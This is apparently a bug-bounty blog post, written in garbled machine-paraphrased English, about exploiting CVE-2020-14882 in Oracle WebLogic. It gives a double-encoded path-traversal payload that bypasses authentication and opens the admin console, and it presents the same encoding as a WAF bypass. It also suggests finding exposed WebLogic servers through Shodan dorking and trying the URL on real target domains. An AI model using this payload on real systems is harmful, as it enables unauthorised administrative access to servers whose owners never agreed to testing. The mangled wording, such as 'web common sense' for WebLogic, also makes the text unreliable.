Easy Vulnerability Leads To admin Console, P1 type
So I even have commenced looking on one target to deliver me permission to Disclosed Name of the Program}
Let’s start
after looking at a few low hanging. And after a few Recon, I turned into looking on Technologies which turned into Web common sense Services and I observed CVE 2020–14882 turned into prone to the 12.1.3.0.0 models of internet common sense
( oracle ) Version 12.1.3.0.0
Lets start with exploit,
For example lets assume the site was hosted on this IP : 192.168.1.79 and the port of web logic is 7001
As we all know we can bypass WAF sometimes with just “ / “
This was the payload:- %252e%252e%252f you Guyz can encode and check , So this payload was just bypassing Waf now i was not happy with bypassing WAF i was hunting for big impact so i found one more payload which Directing me to admin console access
Payload:- https://192.168.1.79:7001/console/images/%252e%252e%252fconsole.portal
The IP is just for example, Focus on payload which was this /console/images/%252e%252e%252fconsole.portal
SO here is the screen Shot POC
Now Tip for Bug Hunters,
How you can Find this, Where you can Find This,
- Find on shodan.io with some dorking
- Websites which used Web logic Oracle
- Tip for beginners
- What if we dont have IP ? what if we dont see port open of 7001 ? how we can exploit ? without this ? ……. Don’t worry Guys you can do it
- SO just change the url like this :- https://taget.com//console/images/%252e%252e%252fconsole.portal
- But keep one thing in mind that first you need to find login page of console so the end point of website can be anything
- For references Video Poc
- https://youtu.be/O0ZnLXRY5Wo
Thanks All stay connected will post more new things
Read Other Blogs Here: Blogs